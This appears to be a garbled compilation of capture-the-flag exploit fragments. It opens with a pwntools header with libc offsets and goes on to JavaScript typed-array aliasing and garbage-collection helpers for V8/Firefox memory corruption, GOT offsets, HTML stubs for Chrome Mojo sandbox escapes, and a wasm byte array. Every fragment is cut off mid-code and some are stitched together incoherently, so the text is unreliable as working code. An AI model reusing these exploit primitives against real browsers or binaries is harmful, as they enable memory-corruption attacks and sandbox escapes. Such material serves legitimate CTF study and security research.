#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
from IO_FILE import *
import random
####Addr
# Hard-coded libc-relative offsets. These are build-specific: they only hold for the
# exact libc the exploit was developed against and must be re-derived for any other
# build (e.g. with `readelf -s` / pwntools' ELF(...).symbols). TODO confirm which build.
leak_offset = 0x1b39e7  # presumably offset of the leaked pointer from libc base — verify
system = 0x4f4e0        # presumably offset of libc's system() — verify against the target build
class Helpers {
constructor() {
  // One 8-byte backing store shared by three typed-array views, so a value
  // written through one view can be read back reinterpreted through another
  // (float64 <-> uint64 <-> low/high uint32 pair). The views alias the same
  // bytes; they are not copies.
  const backing = new ArrayBuffer(8);
  this.cvt_buf = backing;
  this.cvt_f64a = new Float64Array(backing);
  this.cvt_u64a = new BigUint64Array(backing);
  this.cvt_u32a = new Uint32Array(backing);
}
ftoi(f) {
add proper chain handling
//"use script";
const color_red = "";
const color_green = "";
const color_yellow = "";
const color_blue = "";
const color_mag = "";
const color_cyan = "";
const color_default = "";
<html>
<head>
<script>
( async() => {
let gc = function() {
  // Allocate a burst of large (256 MiB) ArrayBuffers and drop them at once.
  // Page script has no direct GC API; the external-memory pressure from these
  // allocations is what coaxes the engine into running a collection.
  // NOTE(review): count and size are hand-tuned — whether a GC actually runs
  // depends on the engine's heuristics and is not guaranteed.
  let round = 0;
  while (round < 100) {
    new ArrayBuffer(0x10000000);
    round += 1;
  }
}
function pwn() {
/* Helpers */
var k_jsObjectSize = 0x70
var fclose_got = 0x45e58
var __libc_atoi = 0x18ea90
var __libc_environ = 0x1ef2e0
var __free_got = 0x4dde0
var __je_free = 0x13b10
<html>
<head>
<title>RedPwn sbx-1</title>
</head>
<body>
<h1>:thonk:</h1>
<pre id='log'></pre>
</body>
<script src='./mojo_bindings.js'></script>
<script src='./third_party/blink/public/mojom/desert.mojom.js'></script>
<html>
<head>
<title>0ctf sbx</title>
</head>
<body>
<h1>HK</h1>
<pre id='log'></pre>
</body>
<script src='./mojo_bindings.js'></script>
<script src='./mojo_js/third_party/blink/public/mojom/tstorage/tstorage.mojom.js'></script>

Exploit (First blood)

let wasm_code = new Uint8Array([
  0, 97,115,109,  1,  0,  0,  0,  1,133,128,128,128,  0,
  1, 96,  0,  1,127,  3,130,128,128,128,  0,  1,  0,  4,
  132,128,128,128,  0,  1,112,  0,  0,  5,131,128,128,128,
  0,  1,  0,  1,  6,129,128,128,128,  0,  0,  7,145,128,
  128,128,  0,2,6,109,101,109,111,114,121,2,0,4,109,97,
  105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,
  0,65,42,11
GoogleCtf 2021 fullchain
<html>
<head>
<title>google-ctf fullchain</title>
</head>
<body>
<h1>HK</h1>
<pre id='log'></pre>
</body>
<script src='./mojo/mojo_bindings.js'></script>
<script src="./mojo/third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
first firefox pwn

outfoxed exp (First Blood)

let pwn = async function() {
  /* Helpers */
  let conversionBuffer = new ArrayBuffer(0x40)
  let floatView = new Float64Array(conversionBuffer)
  let intView = new BigUint64Array(conversionBuffer)

  BigInt.prototype.i2f = function() {
    intView[0] = this